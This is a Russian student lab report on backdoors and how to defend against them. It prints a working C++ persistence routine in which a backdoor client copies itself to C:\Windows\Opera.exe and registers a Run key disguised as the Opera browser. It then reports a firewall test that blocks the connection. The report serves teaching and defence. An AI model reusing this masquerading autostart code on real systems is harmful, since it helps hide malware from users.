Защита от встраиваемых потайных ходов

1. Министерство образования и науки Российской Федерации
2. Санкт-Петербургский Политехнический Университет Петра Великого
3. —
4. Институт прикладной математики и механики
5. Кафедра «Информационная безопасность компьютерных систем»

ЛАБОРАТОРНАЯ РАБОТА № 4

1. «Защита от встраиваемых потайных ходов»
3. по дисциплине «Основы информационной безопасности»

1. Выполнили
2. студент гр. 4851001/10002                       Сергеев Н.С.

                                                         <подпись>

2. Проверил
3. преподаватель                       Калинин М.О.

                                            <подпись>

1. Санкт-Петербург 2022

1. Цель работы

Приобрести навыки по анализу структуры, функциональности и угроз специально встраиваемого дефекта программного продукта – потайного хода (backdoor), а также изучить методы защиты от уязвимостей такого вида.

1. Ход работы

1. Использованные методы маскировки:

Для маскировки клиентская часть программы запускается без окна. Название программы похоже на название исполняемого файла одного из распространённых веб браузеров, что должно вызвать дополнительное доверие. При прописывании ключа в реестре для автозагрузки используется строка «Opera browser», что намекает на необходимость запуска.

1. Описание добавления программы-клиента в автозагрузку:

Поскольку предполагается использование потайного хода на Windows-системе, клиентская программа добавляет в системный реестр ключ для автоматической загрузки вместе с системой. В исходном коде клиента это метод autoloading();. Перед этим программа копирует себя в системный каталог, и прописывает автозапуск для исполняемого файла уже из диска C. Таким образом, удаление первоначального файла не приведёт к решению проблемы.

void autoloading()

{

        HKEY hKey = NULL;

        char way[0x100];

        GetModuleFileName(NULL, way, sizeof(way)); //извлекает полный путь доступа к исполняемому файлу

        CopyFile(way, "C:\\Windows\\Opera.exe", 1); //копирует существующий файл в новый файл

        LONG rc = RegOpenKeyEx(HKEY_CURRENT_USER, TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"), 0, KEY_ALL_ACCESS, &hKey);

        if (rc == ERROR_SUCCESS)

        {

                way[0] = '\0';

                strcpy(way, "C:\\Windows\\Opera.exe");

                RegSetValueEx(hKey, "Opera browser", NULL, REG_SZ, (LPBYTE)way, strlen(way)); //создает параметр в разделе реестра

                RegCloseKey(hKey);

        }

        else

        {

                printf("Error!");

        }

}

1. Межсетевой экран Comodo:

Установив программный межсетевой экран “Comodo Фаервол” на атакуемый компьютер, фиксируем список открытых сетевых портов, а также отмечаем поведение межсетевого экрана на запуск клиента:

После того, как разрешаем запрос на соединение, фиксируем сетевые порты, которые ими использовались. Блокируем их и по новой производим запуск клиента и сервера. После блокировки порта соединение с сервером не было установлено.